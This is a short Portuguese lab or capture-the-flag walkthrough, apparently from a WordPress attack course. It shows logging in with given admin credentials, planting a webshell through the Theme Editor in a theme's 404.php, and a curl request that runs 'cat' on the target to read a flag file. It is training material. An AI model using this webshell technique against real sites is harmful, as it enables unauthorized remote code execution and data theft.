Question

Use as credenciais do usuário administrador [admin:sunshine1] e carregue um webshell para seu destino. Depois de ter acesso ao destino, obtenha o conteúdo do arquivo “flag.txt” no diretório inicial do diretório “wp-user”.

Fazer login

Clique Appearanceno painel lateral e selecione Theme Editor. Esta página nos permitirá editar o código-fonte PHP diretamente.

Podemos validar que alcançamos o RCE inserindo o URL no navegador da web ou emitindo a cURLsolicitação abaixo.

curl http://83.136.253.165:52285/wp-content/themes/twentyseventeen/404.php\?cmd\=cat+/home/wp-user/flag.txt

PreviousRemote Code Execution (RCE) via the Theme Editor NextAttacking WordPress with Metasploit

Last updated 1 year ago